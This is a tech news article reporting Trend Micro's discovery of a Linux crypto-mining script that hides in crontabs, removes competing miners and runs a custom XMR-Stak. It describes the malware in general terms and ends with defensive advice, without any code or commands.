New Crypto-Mining Malware Cleans the Linux Host to Maximize its Benefits

  • A new malicious cryptocurrency mining script is hiding well in crontabs to plague Linux systems.
  • The new script is detecting and deleting quite a few of the known Linux miners, essentially cleaning the host for itself.
  • The basis for its code is KORKERDS, but it comes with subtle but crucial improvements compared to it.

Trend Micro researchers have discovered a new crypto-mining malware that deletes a large number of known Linux coin miners so that the host system resources are all available to itself. The script uses code from KORKERDS and Xbash, combining obfuscation and persistence traits. This new malware uses crontabs commands to download and execute more malicious code. Cron is a time-based task scheduler for Linux, so the script can run periodically without getting affected by system reboots, re-downloading the malware code in the case that it has been detected and deleted.

Compared to the KORKERDS code that has been used as a basis for this new malware, it does not uninstall any security products found in the infected system, and neither does it install a rootkit. Instead, these components are included in its kill list, so if the original KORKERDS is already in the system, it gets stopped. The cryptocurrency miner that is downloaded by the script is a custom version of XMR-Stak, one that supports a wide range of CPUs and GPUs, so the mining results are optimal. This new malware script does not only kill all other coin miners and malware, but it also spots relevant connections and services to specific IP addresses and suspends these as well.

The script inserts a single crontab to make the fetching and execution of the BASE64-encoded code possible. Instead, KORKERDS uses crontab more extensively and openly, so this new script sports a higher level of concealing in its operation, while the propagation is still based on the KORKERDS Python script. Although subtle, the differences between the KORKERDS and the new script are key in its operational routine efficiency and effectiveness. Removing all competing miners and malware are or at least stopping them may make this original script look like a better evil, but that doesn’t mean that the infected system will run any faster under its rule.

The best practice against this type of infections remains the multi-layered system setting so that when a malicious script finds its way into a farm, it can be isolated and contained to a group of systems at worst. Regularly checking crontab entries and monitoring the tasks that eat up system resources is another solid way to detect possible malware infections. For a full list of the indicators of compromise by this new crypto-mining malware, check the detailed Trend Micro security report.

Have you ever been infected by crypto-mining malware? Let us know of your experience in the comments section below, and don’t forget to like and subscribe on our socials on Facebook and Twitter, your portal to daily tech news.

REVIEW OVERVIEW

Recent Articles

How to Watch ‘Flipping Across America’ Online – Live Stream Season 1

HGTV is making sure that our summers are full of excitement and new shows, and we are certain that Flipping Across America will take...

Qualcomm Snapdragon 865 Plus Is a 3GHz+ Gaming Beast

Qualcomm has boosted the Snapdragon 865 by 10%, delivering a powerful 5G flagship chip. The “Plus” version comes with all the goodies...

“Religare” and “Impact Guru” Leaked the Data of 5.5 Million Indians

Two catastrophic data breaches hit Indian companies dealing with health insurance and crowdfunding. The data that has been stolen is extremely sensitive,...

Intel Presented the Technical Specifications of the Thunderbolt 4 Interface

The Thunderbolt 4 controllers will soon be made available to hardware vendors. The new protocol is unquestionably an improvement over the previous...

How to Watch ‘Cannonball’ Online – Live Stream Season 1

Summertime is all about the light content, and the contests that keep it fun, and that's exactly what Cannonball is all about. Scheduled to...

Technology

How to Watch ‘Flipping Across America’ Online – Live Stream Season 1

HGTV is making sure that our summers are full of excitement and new shows, and we are certain that...
- Advertisement -

Qualcomm Snapdragon 865 Plus Is a 3GHz+ Gaming Beast

Qualcomm has boosted the Snapdragon 865 by 10%, delivering a powerful 5G flagship chip. The “Plus” version comes with all the goodies...

“Religare” and “Impact Guru” Leaked the Data of 5.5 Million Indians

Two catastrophic data breaches hit Indian companies dealing with health insurance and crowdfunding. The data that has been stolen is extremely sensitive,...

Intel Presented the Technical Specifications of the Thunderbolt 4 Interface

The Thunderbolt 4 controllers will soon be made available to hardware vendors. The new protocol is unquestionably an improvement over the previous...

How to Watch ‘Cannonball’ Online – Live Stream Season 1

Summertime is all about the light content, and the contests that keep it fun, and that's exactly what Cannonball is all about. Scheduled to...